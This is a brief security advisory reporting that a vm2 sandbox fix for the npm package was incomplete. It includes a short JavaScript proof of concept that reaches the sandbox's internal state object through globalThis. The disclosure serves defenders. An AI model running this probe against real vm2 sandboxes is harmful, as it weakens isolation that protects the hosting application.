PT-2026-41697 · Npm · Vm2
Published
2026-05-08
·
Updated
2026-05-08
CVSS v3.1
5.3
Medium
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
Summary
https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.
Details
It is still possible to get access to
VM2 INTERNAL STATE DO NOT USE OR PROGRAM WILL FAIL.PoC
js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
globalThis['VM2 INTERNAL STATE DO NOT USE OR PROGRAM WILL FAIL']
`));Fix
Protection Mechanism Failure
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Vm2